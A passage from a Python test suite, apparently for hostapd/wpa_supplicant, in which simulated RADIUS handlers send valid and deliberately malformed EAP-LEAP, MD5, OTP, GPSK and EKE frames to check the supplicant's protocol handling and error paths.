EAP_TYPE_LEAP,
1, 0, 24,
0, 0, 0, 0, 0, 0)
if ctx['num'] == 15:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 16:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
if ctx['num'] == 17:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 18:
logger.info("Test: Success")
return struct.pack(">BBHB", EAP_CODE_SUCCESS, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
# hostapd will drop the next frame in the sequence
if ctx['num'] == 19:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 20:
logger.info("Test: Failure")
return struct.pack(">BBHB", EAP_CODE_FAILURE, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
return None
srv = start_radius_server(leap_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 12):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
if i == 10:
logger.info("Wait for additional roundtrip")
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def test_eap_proto_md5(dev, apdev):
"""EAP-MD5 protocol tests"""
check_eap_capa(dev[0], "MD5")
def md5_handler(ctx, req):
logger.info("md5_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
if ctx['num'] == 1:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_MD5)
if ctx['num'] == 2:
logger.info("Test: Zero-length challenge")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_MD5,
0)
if ctx['num'] == 3:
logger.info("Test: Truncated challenge")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_MD5,
1)
if ctx['num'] == 4:
logger.info("Test: Shortest possible challenge and name")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
return None
srv = start_radius_server(md5_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 4):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def test_eap_proto_md5_errors(dev, apdev):
"""EAP-MD5 local error cases"""
check_eap_capa(dev[0], "MD5")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
with fail_test(dev[0], 1, "chap_md5"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="phase1-user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_md5_process"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="phase1-user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
def test_eap_proto_otp(dev, apdev):
"""EAP-OTP protocol tests"""
def otp_handler(ctx, req):
logger.info("otp_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
if ctx['num'] == 1:
logger.info("Test: Empty payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_OTP)
if ctx['num'] == 2:
logger.info("Test: Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'],
4)
if ctx['num'] == 3:
logger.info("Test: Challenge included")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_OTP,
ord('A'))
if ctx['num'] == 4:
logger.info("Test: Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'],
4)
return None
srv = start_radius_server(otp_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 1):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="OTP", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="OTP", identity="user", wait_connect=False)
ev = dev[0].wait_event(["CTRL-REQ-OTP"])
if ev is None:
raise Exception("Request for password timed out")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-OTP-" + id + ":password")
ev = dev[0].wait_event("CTRL-EVENT-EAP-SUCCESS")
if ev is None:
raise Exception("Success not reported")
finally:
stop_radius_server(srv)
EAP_GPSK_OPCODE_GPSK_1 = 1
EAP_GPSK_OPCODE_GPSK_2 = 2
EAP_GPSK_OPCODE_GPSK_3 = 3
EAP_GPSK_OPCODE_GPSK_4 = 4
EAP_GPSK_OPCODE_FAIL = 5
EAP_GPSK_OPCODE_PROTECTED_FAIL = 6
def test_eap_proto_gpsk(dev, apdev):
"""EAP-GPSK protocol tests"""
def gpsk_handler(ctx, req):
logger.info("gpsk_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_GPSK)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown opcode")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_GPSK,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected GPSK-3")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Too short GPSK-1")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Truncated ID_Server")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Missing RAND_Server")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Missing CSuite_List")
return struct.pack(">BBHBBH8L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Truncated CSuite_List")
return struct.pack(">BBHBBH8LH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Empty CSuite_List")
return struct.pack(">BBHBBH8LH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Invalid CSuite_List")
return struct.pack(">BBHBBH8LHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 1,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 No supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected GPSK-1")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite but too short key")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short GPSK-3")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in RAND_Peer")
return struct.pack(">BBHBB8L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3,
0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing RAND_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in RAND_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8L", 1, 1, 1, 1, 1, 1, 1, 1)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing ID_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8L", 0, 0, 0, 0, 0, 0, 0, 0)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Truncated ID_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LH", 0, 0, 0, 0, 0, 0, 0, 0, 1)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in ID_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 3,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHB", 0, 0, 0, 0, 0, 0, 0, 0, 1, ord('B'))
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBHB8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 3 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 1, ord('A'),
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in ID_Server (same length)")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 3,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[15:47]
msg += struct.pack(">8LHB", 0, 0, 0, 0, 0, 0, 0, 0, 1, ord('B'))
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing CSuite_Sel")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LH", 0, 0, 0, 0, 0, 0, 0, 0, 0)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in CSuite_Sel")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing len(PD_Payload_Block)")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Truncated PD_Payload_Block")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLHH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing MAC")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6 + 3,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLHHB",
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 123)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Incorrect MAC")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6 + 3 + 16,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLHHB4L",
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 123,
0, 0, 0, 0)
return msg
return None
srv = start_radius_server(gpsk_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 27):
if i == 12:
pw = "short"
else:
pw = "abcdefghijklmnop0123456789abcdef"
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="GPSK", identity="user", password=pw,
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
EAP_EKE_ID = 1
EAP_EKE_COMMIT = 2
EAP_EKE_CONFIRM = 3
EAP_EKE_FAILURE = 4
def test_eap_proto_eke(dev, apdev):
"""EAP-EKE protocol tests"""
def eke_handler(ctx, req):
logger.info("eke_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_EKE)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown exchange")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No NumProposals in EAP-EKE-ID/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: NumProposals=0 in EAP-EKE-ID/Request")
return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated Proposals list in EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4,
EAP_TYPE_EKE,
EAP_EKE_ID,
2, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported proposals in EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4B4B4B4B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 * 4,
EAP_TYPE_EKE,
EAP_EKE_ID,
4, 0,
0, 0, 0, 0,
3, 0, 0, 0,
3, 1, 0, 0,
3, 1, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing IDType/Identity in EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4B4B4B4B4B",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 5 * 4,
EAP_TYPE_EKE,
EAP_EKE_ID,
5, 0,
0, 0, 0, 0,
3, 0, 0, 0,
3, 1, 0, 0,
3, 1, 1, 0,
3, 1, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
3, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
3, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
3, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-EKE-Confirm/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_CONFIRM)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short EAP-EKE-Failure/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_FAILURE)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-EKE-Commit/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_COMMIT)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
3, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short EAP-EKE-Commit/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_COMMIT)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
1, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: All zeroes DHComponent_S and empty CBvalue in EAP-EKE-Commit/Request")
return struct.pack(">BBHBB4L32L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 128,
EAP_TYPE_EKE,
EAP_EKE_COMMIT,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
